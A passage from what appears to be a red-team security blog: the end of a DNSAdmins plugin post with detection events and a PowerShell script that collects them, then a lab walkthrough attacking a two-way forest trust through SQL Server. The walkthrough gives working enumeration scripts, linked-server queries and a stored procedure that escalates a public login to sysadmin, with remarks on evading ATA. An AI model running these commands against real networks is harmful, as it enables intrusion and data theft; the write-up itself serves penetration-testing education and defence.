Neat! SYSTEM on the domain controller. We own this domain and possibly the entire forest :D</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For our second scenario, where the DNS service is not running on the DC, we still get SYSTEM on the DNS server itself with 'only' the privileges of DNSAdmins plus the ability to restart the DNS service. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>How to detect the attack? </b></div>
<div style="text-align: justify;">
<br />
To prevent the attack, audit the ACL of the DNS server object for write privileges, keep membership of the DNSAdmins group to a minimum and apply Microsoft's patch for CVE-2021-40469 (see the update at the top of the post). <br />
<br />
Obvious indicators are the DNS service restart and a couple of log entries:</div>
<div style="text-align: justify;">
DNS Server log Event ID 150 when the plugin DLL fails to load and 770 when it loads successfully</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pxNKhucIGerEQx9AMr68ExE2P5JeHPw63JFUtkn_FiKXmjZa4Z4yp6MrekSMSwY2OSx6wr249l6M_qbP4GItKXdsyM66meaejIKMZefJBdjpZC1TDdvUKzOSoZE6DFlR5UB1vSlWjjo/s1600/event150.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pxNKhucIGerEQx9AMr68ExE2P5JeHPw63JFUtkn_FiKXmjZa4Z4yp6MrekSMSwY2OSx6wr249l6M_qbP4GItKXdsyM66meaejIKMZefJBdjpZC1TDdvUKzOSoZE6DFlR5UB1vSlWjjo/s400/event150.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlrp3xMXPo8xnD_lZbwgk4qyWPAtLq69zp8PClTgDwypzO5YqQD0C8c0JVAAzBklX_NJn669qJ9zBKpXERmBlP3K8MiVbF_KL2HPNJFDobcoH06yzkKr-3AIuHanHsf0lEOtls0qsWAeY/s1600/event770.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlrp3xMXPo8xnD_lZbwgk4qyWPAtLq69zp8PClTgDwypzO5YqQD0C8c0JVAAzBklX_NJn669qJ9zBKpXERmBlP3K8MiVbF_KL2HPNJFDobcoH06yzkKr-3AIuHanHsf0lEOtls0qsWAeY/s400/event770.jpg" width="400" /></a></div>
Microsoft-Windows-DNS-Server/Audit log Event ID 541, logged for both success and failure. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguq93EtZFhGTCquf_OUOM5pUBr8WRhaEBCyZTYE-B63iHcwhiEA-sUhOqoAfLNA-ga9zqYsB-sf8zbYCD1xT3HankxY_NjJ82Ylltm0acSIUSCbEh5R1daZrjgtLhd1u0BnKFhM2ST5Mg/s1600/event541.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguq93EtZFhGTCquf_OUOM5pUBr8WRhaEBCyZTYE-B63iHcwhiEA-sUhOqoAfLNA-ga9zqYsB-sf8zbYCD1xT3HankxY_NjJ82Ylltm0acSIUSCbEh5R1daZrjgtLhd1u0BnKFhM2ST5Mg/s400/event541.jpg" width="400" /></a></div>
Monitoring changes to HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll will also help; on a normal DC this value does not exist at all, and a UNC path in it is a very strong signal.<br />
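The indicators listed above, collected from one DNS server in a single pass. This is an added example, not code from the post; it assumes the ActiveDirectory module, WinRM and remote event-log access to the DNS server (the lab's ops-dc), and the second function assumes that the DNS server's ACL lives on CN=MicrosoftDNS,CN=System in the domain partition.

```powershell
# Added example, not code from the post. Pulls the indicators listed above from
# one DNS server: the ServerLevelPluginDll value, DNS Server log events
# 150/770, audit event 541, Service Control Manager restarts and the current
# DNSAdmins membership. Assumes the ActiveDirectory module, WinRM and remote
# event-log access to the DNS server (here the lab's 'ops-dc').
function Get-DnsServerPluginIndicators {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$Days = 7
    )
    $since = (Get-Date).AddDays(-$Days)

    # a) On a normal DC the value is absent; any value, and a UNC path in
    #    particular, is worth an alert.
    $plugin = Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
            -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
    }

    # b) DNS Server log: 150 = the plugin DLL failed to load, 770 = it loaded.
    $loadEvents = Get-WinEvent -ComputerName $ComputerName -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'DNS Server'; Id = 150, 770; StartTime = $since }

    # c) Audit log 541: the configuration change itself.
    $auditEvents = Get-WinEvent -ComputerName $ComputerName -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'Microsoft-Windows-DNS-Server/Audit'; Id = 541; StartTime = $since }

    # d) SCM 7036: the DNS Server service entering the stopped/running state.
    $restarts = Get-WinEvent -ComputerName $ComputerName -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7036; StartTime = $since } |
        Where-Object { $_.Message -like '*DNS Server service*' }

    # e) Everyone who is in DNSAdmins, nested groups resolved.
    $members = Get-ADGroupMember -Identity DNSAdmins -Recursive | Select-Object -ExpandProperty SamAccountName

    [pscustomobject]@{
        ComputerName         = $ComputerName
        ServerLevelPluginDll = $plugin
        UncPluginPath        = [bool]($plugin -and $plugin.StartsWith('\\'))
        PluginLoadEvents     = @(@($loadEvents)  | ForEach-Object { "$($_.TimeCreated) id=$($_.Id)" })
        AuditEvents          = @(@($auditEvents) | ForEach-Object { "$($_.TimeCreated) $($_.Message -replace '\s+', ' ')" })
        ServiceRestarts      = @(@($restarts)    | ForEach-Object { "$($_.TimeCreated) $($_.Message -replace '\s+', ' ')" })
        DnsAdminsMembers     = @($members)
    }
}

# Who can write to the DNS server object in AD. That the server ACL lives on
# CN=MicrosoftDNS,CN=System is an assumption; adjust the DN if your forest
# differs. Anything beyond the built-in admin groups and DnsAdmins deserves a look.
function Get-DnsServerObjectWriters {
    $dn = "CN=MicrosoftDNS,CN=System,$((Get-ADDomain).DistinguishedName)"
    (Get-Acl -Path "AD:\$dn").Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty' } |
        Select-Object IdentityReference, ActiveDirectoryRights, IsInherited
}

Get-DnsServerPluginIndicators -ComputerName ops-dc | Format-List
Get-DnsServerObjectWriters | Format-Table -AutoSize
```

A 541 followed within minutes by a 7036 stop/start and a 770 is the whole attack in three lines of log; on a DC, a populated ServerLevelPluginDll alone is enough to page someone.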
<br />
<br />
Hope you liked the post. Please leave feedback and comments. <br />
<br /></div>
<b>Using SQL Server for attacking a Forest Trust</b> (Nikhil "SamratAshok" Mittal, published 2017-03-23, updated 2018-01-14)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Recently I started playing with the awesome <a href="https://github.com/NetSPI/PowerUpSQL">PowerUpSQL</a> tool by the folks at <a href="https://blog.netspi.com/powerupsql-powershell-toolkit-attacking-sql-server/">NetSPI</a>. I was interested in the ability to attack an Active Directory (AD) environment using access to a SQL Server, that is, staying in the database layer for as long as possible. Fortunately, during a Red team engagement a few weeks back, I had a chance to play with PowerUpSQL extensively. Turns out that it is very much possible to enumerate and attack, from the database layer, not only the current domain but also a trusting forest in a <a href="https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx">Two-Way External Trust</a>. Let's have a look at it!</div>
<br />
<b>Network Diagram</b><br />
<div style="text-align: justify;">
I have mapped the client network to my lab on a much smaller scale. We have access to the SQL Server ops-sqlsrvone, where we have only public privileges, and can communicate with only selected machines in the defensiveps.com forest.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6TVzxMK_l8iOWo_xdsM4_WUIfae-PCwJYqU2cxaQit_lGVr9HrBUsR7anQ0CzJE4jp_A6XgxMnVfOyosk4zW7IjDjcWb8N8wfSuvDJBPQPQegtpz1nuDrlyHBd6E1qkD4XbXuB-5MdUE/s1600/Diag_Final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6TVzxMK_l8iOWo_xdsM4_WUIfae-PCwJYqU2cxaQit_lGVr9HrBUsR7anQ0CzJE4jp_A6XgxMnVfOyosk4zW7IjDjcWb8N8wfSuvDJBPQPQegtpz1nuDrlyHBd6E1qkD4XbXuB-5MdUE/s400/Diag_Final.png" width="400" /></a></div>
<br />
<b>Cross Forest Enumeration</b> <br />
<div style="text-align: justify;">
PowerUpSQL can enumerate accounts of the current domain using an interesting <a href="https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/">fuzzing method</a> (resolving the domain SID plus a range of RIDs back to names). In our lab setup we know that there is a trust relationship between offensiveps and a forest called defensiveps (PowerView, netdom or Get-ADTrust will show it). But PowerUpSQL does not provide a way of specifying an alternate domain to enumerate accounts from; changing a single variable in the code makes it use the alternate domain. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIFHD8uSbin-XDsjLVzGsxhZJzqQYRvFLYDgR7u-g2JdZsWXb_Tlmga2BVBobWT0CIbBSpz7KXUgkocAp7xeuqeqMQ9XFo4RGO3QCJSDNOddHco2IKItk6EL8GJNBJrjwpN1RsRbdIXUw/s1600/Alternate_Domain.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIFHD8uSbin-XDsjLVzGsxhZJzqQYRvFLYDgR7u-g2JdZsWXb_Tlmga2BVBobWT0CIbBSpz7KXUgkocAp7xeuqeqMQ9XFo4RGO3QCJSDNOddHco2IKItk6EL8GJNBJrjwpN1RsRbdIXUw/s400/Alternate_Domain.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Now it is possible to enumerate interesting information from the target domain, which is in a different forest. After modifying the value of the $Domain variable, import the PowerUpSQL module and run the command below:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-SQLFuzzDomainAccount -Instance ops-sqlsrvone -StartId 500 -EndId 5000
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqXGgEpfqG4ArbpAWdIsPtb17t64rMjzyPOs2gvsZYchCwMx3SR2OKjoQGgze3HGuwa-6pt2euUbo6qEnbhUqU-mDUFZ2oXi5TJDXFY8sSysgo6rpZhjif3iu_ESbhBXt4Rlbc_Zwt9YY/s1600/User_Enumeration.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqXGgEpfqG4ArbpAWdIsPtb17t64rMjzyPOs2gvsZYchCwMx3SR2OKjoQGgze3HGuwa-6pt2euUbo6qEnbhUqU-mDUFZ2oXi5TJDXFY8sSysgo6rpZhjif3iu_ESbhBXt4Rlbc_Zwt9YY/s400/User_Enumeration.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Neat! We got a list of target domain's users, groups, computers etc.</div>
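The same enumeration with the target domain as a parameter rather than a patched variable. This is an added example, not code from the post or from PowerUpSQL: it implements the SID-by-RID idea of Get-SQLFuzzDomainAccount directly in T-SQL, so everything runs inside the SQL Server with public privileges. The instance name ops-sqlsrvone and the domain name defensiveps are the lab's; that 'Domain Admins' resolves through the trust is assumed.

```powershell
# Added example, not code from the post or from PowerUpSQL. One known group
# gives the domain SID prefix through SUSER_SID(); SUSER_SNAME() then resolves
# prefix + RID for a RID range, all inside the SQL Server. Assumed names:
# instance 'ops-sqlsrvone', trusted domain 'defensiveps'; needs only public.
function Invoke-SqlQuery([string]$Instance, [string]$Query) {
    $conn = New-Object System.Data.SqlClient.SqlConnection("Server=$Instance;Integrated Security=SSPI;")
    $conn.Open()
    try {
        $reader = (New-Object System.Data.SqlClient.SqlCommand($Query, $conn)).ExecuteReader()
        $table = New-Object System.Data.DataTable
        if ($reader.FieldCount -gt 0) { $table.Load($reader) }
        return ,$table
    } finally { $conn.Close() }
}

function Get-SqlDomainAccountByRid {
    param(
        [Parameter(Mandatory)][string]$Instance,
        [Parameter(Mandatory)][string]$Domain,      # NetBIOS name of the domain to enumerate
        [int]$StartId = 500,
        [int]$EndId = 5000,
        [string]$KnownGroup = 'Domain Admins'       # present in every domain (RID 512)
    )
    $tsql = @"
DECLARE @known VARBINARY(85) = SUSER_SID(N'$Domain\$KnownGroup');
IF @known IS NULL
    RAISERROR('This server could not resolve $Domain\$KnownGroup (no trust, or wrong NetBIOS name)', 16, 1);
-- SID layout: revision | sub-authority count | authority | sub-authorities.
-- Dropping the last 4 bytes (the RID) leaves the domain SID; appending a
-- new RID keeps the count byte correct.
DECLARE @domainSid VARBINARY(85) = SUBSTRING(@known, 1, DATALENGTH(@known) - 4);
WITH rids AS (
    SELECT $StartId AS rid
    UNION ALL SELECT rid + 1 FROM rids WHERE rid < $EndId
)
SELECT r.rid, n.account
FROM rids r
CROSS APPLY (SELECT CAST(r.rid AS BINARY(4)) AS be) b          -- big-endian int
CROSS APPLY (SELECT SUSER_SNAME(@domainSid                      -- RID is little-endian
             + SUBSTRING(b.be,4,1) + SUBSTRING(b.be,3,1)
             + SUBSTRING(b.be,2,1) + SUBSTRING(b.be,1,1)) AS account) n
WHERE n.account IS NOT NULL
OPTION (MAXRECURSION 0);
"@
    Invoke-SqlQuery -Instance $Instance -Query $tsql | Select-Object rid, account
}

# Enumerate the trusted forest's domain from ops-sqlsrvone:
Get-SqlDomainAccountByRid -Instance ops-sqlsrvone -Domain defensiveps -StartId 500 -EndId 5000
```

Every SUSER_SNAME call is a name lookup performed by the SQL Server's host, so the DCs see ordinary LSA/SAMR traffic from the database server and nothing at all from our box.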
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The enumeration above also listed the SQL Servers in the defensiveps domain. Now, mimicking the network I encountered during the assessment, only dps-sqlsrvdev, a couple of DCs and some terminal servers in the defensiveps network are directly reachable. So, let's enumerate dps-sqlsrvdev:</div>
<br />
<b>Database logins</b><br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-SQLFuzzServerLogin -Instance dps-sqlsrvdev
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiFfnV7d40y-2PT_2vldeKN0R7i0Zo7AYlEyxoNZ1lPJn1WQ6RdysUBg2bkHWsEMsBXH3GkOD9guHgrLrtrrsEI9PH5LX5-bUkyNRZcWKSvNa-PUZwg54pSYxOFs5R3J3sMl1z8jTFkBk/s1600/enumerate_dps-sqlsrvone.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiFfnV7d40y-2PT_2vldeKN0R7i0Zo7AYlEyxoNZ1lPJn1WQ6RdysUBg2bkHWsEMsBXH3GkOD9guHgrLrtrrsEI9PH5LX5-bUkyNRZcWKSvNa-PUZwg54pSYxOFs5R3J3sMl1z8jTFkBk/s400/enumerate_dps-sqlsrvone.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Our current user is listed as a login above, which is why this enumeration works at all. Let's check what privileges we have:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-SQLServerInfo -Instance dps-sqlsrvdev
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPheTJY3ITWprk6pxCqyGMt4MPoLo9sLJS6qvZj-W7WyJaoQiNIsffbFLOsxtfp2bPFSAStZ-MCAZwZqEe9CTrXhrtxGfy_f3pC5u-ZlkBElBo8K-3zthZ4Nzv7d8RGgPAQmq84OHUHtE/s1600/privs_dps_sqlsrvdev.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPheTJY3ITWprk6pxCqyGMt4MPoLo9sLJS6qvZj-W7WyJaoQiNIsffbFLOsxtfp2bPFSAStZ-MCAZwZqEe9CTrXhrtxGfy_f3pC5u-ZlkBElBo8K-3zthZ4Nzv7d8RGgPAQmq84OHUHtE/s400/privs_dps_sqlsrvdev.jpg" width="400" /></a></div>
<div style="text-align: justify;">
No sysadmin privileges. We can check it manually as well (I am using HeidiSQL as a client):</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_cLN63Yo8uUOs-mVqnims_Dw98jUqxMXX6dvcBKNsuNt5PmUUOcQkZZr7WuA7CmCQ0O5-6MYRll6Dj9oq_ha1V08dfsRIT1Pah7lA9ARj_tfMPWwgprYWjaKddmSx2REAmckLDXuDuxo/s1600/privs_heidi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_cLN63Yo8uUOs-mVqnims_Dw98jUqxMXX6dvcBKNsuNt5PmUUOcQkZZr7WuA7CmCQ0O5-6MYRll6Dj9oq_ha1V08dfsRIT1Pah7lA9ARj_tfMPWwgprYWjaKddmSx2REAmckLDXuDuxo/s400/privs_heidi.jpg" width="400" /></a></div>
<br />
<div style="text-align: justify;">
We can go ahead with a brute-force attack as there are some interesting SQL server logins and generally, account lockouts are not enabled in SQL Server databases and nobody really looks at the logs of authentication failure in SQL Server, at least, on non-production servers. But we are not going to do that right now. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Linked Servers </b></div>
<div style="text-align: justify;">
We can also enumerate linked servers for dps-sqlsrvdev. Let's do it:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-SQLServerLink -Instance dps-sqlsrvdev
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSfLgytAlFQO2wN_o2JjJQXglkE6VFshdQWl7MMb4pFRwEghM_quSsfB83OjsSntDZa04Q9TVldbTS0H6fpMpcR6ajeqZfkct7j5qEzqHksS_XlthaSCR3xqPLuyJ83kwQmF6emBifBpo/s1600/linked_dps-sqlsrvdev.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSfLgytAlFQO2wN_o2JjJQXglkE6VFshdQWl7MMb4pFRwEghM_quSsfB83OjsSntDZa04Q9TVldbTS0H6fpMpcR6ajeqZfkct7j5qEzqHksS_XlthaSCR3xqPLuyJ83kwQmF6emBifBpo/s400/linked_dps-sqlsrvdev.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Nice! A server, dps-sqlsrvtwo, in the defensiveps domain, which we enumerated earlier as well, is linked to the current instance. Note that queries sent over a link execute as the login the link is configured with, so even with only public privileges on the initial server we can run arbitrary queries on the linked server with whatever rights that mapped login has there. Read more about hacking SQL Server links in the <a href="https://blog.netspi.com/how-to-hack-database-links-in-sql-server/">amazing blog by Antti</a>. Link enumeration can be done manually as well:</div>
<pre><textarea cols="70" readonly="readonly" rows="1">select * from master..sysservers
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-wOWiyL0p-w9SupDRtN7tC1wlLNSpTjd-oUbVadJCXFjjaIDTq39p-d8FMrVuqGSBAe8uRuCFt8rPkN5Dm66mwEskncfOaYOTyaia-p5VfV5iS899uNKT12EpP8bFG1UhuRxsk_8kguE/s1600/linked_heidi_dps-sqlsrvdev.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-wOWiyL0p-w9SupDRtN7tC1wlLNSpTjd-oUbVadJCXFjjaIDTq39p-d8FMrVuqGSBAe8uRuCFt8rPkN5Dm66mwEskncfOaYOTyaia-p5VfV5iS899uNKT12EpP8bFG1UhuRxsk_8kguE/s400/linked_heidi_dps-sqlsrvdev.jpg" width="400" /></a></div>
<div style="text-align: justify;">
So, dps-sqlsrvdev has a linked server dps-sqlsrvtwo.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now, to execute queries on the destination server (dps-sqlsrvtwo) we can use Openquery as suggested by Antti in the blog linked above. Let's see our current user and if we have sysadmin privileges:</div>
<pre><textarea cols="70" readonly="readonly" rows="4">select * from openquery("dps-sqlsrvtwo",'select @@version')
select * from openquery("dps-sqlsrvtwo",'select SUSER_NAME()')
select * from openquery("dps-sqlsrvtwo",'select IS_SRVROLEMEMBER(''sysadmin'')')
select * from openquery("dps-sqlsrvtwo",'select IS_SRVROLEMEMBER(''public'')')
</textarea></pre>
<br />
<div style="text-align: justify;">
Turns out that we have only public privileges with a user called dbuser and the target server is SQL Server 2016 SP1.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now we can try the various privilege escalation methods PowerUpSQL offers for SQL Server. The problem is that we can't reach dps-sqlsrvtwo directly and, AFAIK, the tool has no way to run these checks against a linked server. So we need to try the methods manually, one by one. During the Red Team assessment I found a login we could impersonate on a linked server, so let's use that in the lab as well. The logins that can be impersonated are listed by the following SQL query, taken directly from <a href="https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/">this amazing blog</a> by Scott. We wrap it in Openquery so that it executes on the linked server:</div>
<pre><textarea cols="70" readonly="readonly" rows="2">select * from openquery("dps-sqlsrvtwo",'SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = ''IMPERSONATE''')
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHemM1gwzhxTeIhMEolsPvjtggremIkjdCXzN3ZdWG4wlrqRZDayYUMQtOR7rYYTbk6Tc8EcJskOeMQVZzRbs6EEffJL3m0hJRrA9NgAjpoYgM-w97JCAoo7cfJ0T4fodZ6lVsD7kG03c/s1600/linked_impersonation.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHemM1gwzhxTeIhMEolsPvjtggremIkjdCXzN3ZdWG4wlrqRZDayYUMQtOR7rYYTbk6Tc8EcJskOeMQVZzRbs6EEffJL3m0hJRrA9NgAjpoYgM-w97JCAoo7cfJ0T4fodZ6lVsD7kG03c/s400/linked_impersonation.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Looks like we can impersonate a user called "reportsuser". But a command like below is most likely to fail:</div>
<pre><textarea cols="70" readonly="readonly" rows="1">select * from openquery("dps-sqlsrvtwo",'EXECUTE AS LOGIN = ''reportsuser'';select IS_SRVROLEMEMBER(''sysadmin'')')
</textarea></pre>
<div style="text-align: justify;">
Why? Because, apparently, it is not possible to use EXECUTE AS this way without our privileges reverting to the original 'dbuser'. I tried the WITH NO REVERT option as well but soon realized that it may work only when sending the query directly to a database. Please see <a href="https://msdn.microsoft.com/en-us/library/ms181362.aspx">this MSDN documentation on EXECUTE AS</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
No luck there! Let's look for another interesting privilege escalation avenue - trustworthy database. Read this <a href="https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/">very useful blog</a>, once again by Scott, to understand more about trustworthy database. We can use the following query - taken from the blog referenced above - to enumerate trustworthy databases on the target linked server:</div>
<pre><textarea cols="70" readonly="readonly" rows="2">select * from openquery("dps-sqlsrvtwo",'SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;')</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0khDZlCLDGeJPliZtmYjNeZ8Oo1aHvxUxlbe-eY4iLwTsJr555FbF-t5iQveTRIFe_zzkLvYDwLD5cc4fwdZM3o_Vyhdux575WUEK0NBPm-xjg182MRZRzaoNQZF0o68pJnETPh9kj20/s1600/linked_trustworthy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0khDZlCLDGeJPliZtmYjNeZ8Oo1aHvxUxlbe-eY4iLwTsJr555FbF-t5iQveTRIFe_zzkLvYDwLD5cc4fwdZM3o_Vyhdux575WUEK0NBPm-xjg182MRZRzaoNQZF0o68pJnETPh9kj20/s400/linked_trustworthy.jpg" width="400" /></a></div>
<div style="text-align: justify;">
A trustworthy database, 'reports_db'! Let's list the members of the db_owner role. Note that sys.database_role_members is per database, so this shows the database the link lands in, that is, the catalog configured on the link:</div>
<pre><textarea cols="70" readonly="readonly" rows="4">select * from openquery("dps-sqlsrvtwo",'SELECT members.name as ''members_name'', roles.name as ''roles_name'' FROM sys.database_role_members rolemem INNER JOIN sys.database_principals roles ON rolemem.role_principal_id = roles.principal_id INNER JOIN sys.database_principals members ON rolemem.member_principal_id = members.principal_id where roles.name = ''db_owner'' ORDER BY members.name')</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Sdkb4Y75_U-ikrwIRf4ZfCKAHfreiFF4hPDskoABThBDGQ02IMWmqnhkLabsVHjg1fytdmOIR6UUgwnKnv-kip95QOcDnlHrUMU6H5Rf8FgXZtk2H809r86HfMJmETWBauDpNXQS1yE/s1600/linked_db_owner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Sdkb4Y75_U-ikrwIRf4ZfCKAHfreiFF4hPDskoABThBDGQ02IMWmqnhkLabsVHjg1fytdmOIR6UUgwnKnv-kip95QOcDnlHrUMU6H5Rf8FgXZtk2H809r86HfMJmETWBauDpNXQS1yE/s400/linked_db_owner.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Now, let's see whether our current user, dbuser, is db_owner of reports_db on the linked server. Instead of checking the role, let's directly try to create a stored procedure in reports_db that helps us escalate. To create a stored procedure over the link, RPC Out must be enabled for the linked server; it is off by default but quite commonly enabled. The idea is a procedure declared WITH EXECUTE AS OWNER: the owner of reports_db is 'sa', and because the database is TRUSTWORTHY that owner context is honoured for server-level actions. Also note that EXEC ... AT runs in the link's default catalog, so the command below creates the procedure in reports_db only if that is the catalog configured on the link; otherwise switch database first (USE reports_db in the batch, with the CREATE PROCEDURE nested in an inner EXEC, since it has to be the first statement of its own batch). Use the query below to create the stored procedure on the linked server. </div>
<pre><textarea cols="70" readonly="readonly" rows="1">EXEC ('CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember ''dbuser'',''sysadmin''') AT "DPS-SQLSRVTWO"</textarea></pre>
Our stored procedure makes dbuser a sysadmin. Now, let's execute the stored procedure. <br />
<pre><textarea cols="70" readonly="readonly" rows="1">EXEC ('sp_escalate;SELECT IS_SRVROLEMEMBER(''sysadmin'');SELECT SUSER_NAME()') AT "DPS-SQLSRVTWO"</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0ml7IzkkiFkH8Y2ZA7kS5WH55gInsQUY4gPiwseo2NX2N3M5214kjIQq0HIQBMeHosjK5tuWB-bFlgCVbpl-zAZsC6kSb-O5D1bjn3sI_2eci8SWrQjnWO4TcVuVEeMXQHWbofDP-Pw0/s1600/linked_privEsc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0ml7IzkkiFkH8Y2ZA7kS5WH55gInsQUY4gPiwseo2NX2N3M5214kjIQq0HIQBMeHosjK5tuWB-bFlgCVbpl-zAZsC6kSb-O5D1bjn3sI_2eci8SWrQjnWO4TcVuVEeMXQHWbofDP-Pw0/s400/linked_privEsc.jpg" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Neat! Now we can access all databases and tables on the target server. PowerUpSQL provides very useful commands for pillaging a database (and that is what I used first in the assessment to capture some juicy data) but we are not going to use them. See <a href="https://blog.netspi.com/finding-sensitive-data-domain-sql-servers-using-powerupsql/">this blog post</a> for details about that.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In many cases, this is one of the major goals of a red team assessment: staying within the database layer, we have access to multiple SQL servers across the forest trust and to the juicy information stored within them. Since we have not done anything very unusual or noisy up to now, the chances of detection are very low. In fact, in my lab I have Microsoft Advanced Threat Analytics (ATA) set up and the attack was not detected. Obviously, because we did not communicate with the domain controller at all, and ATA looks only at DC traffic. Take that ATA!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
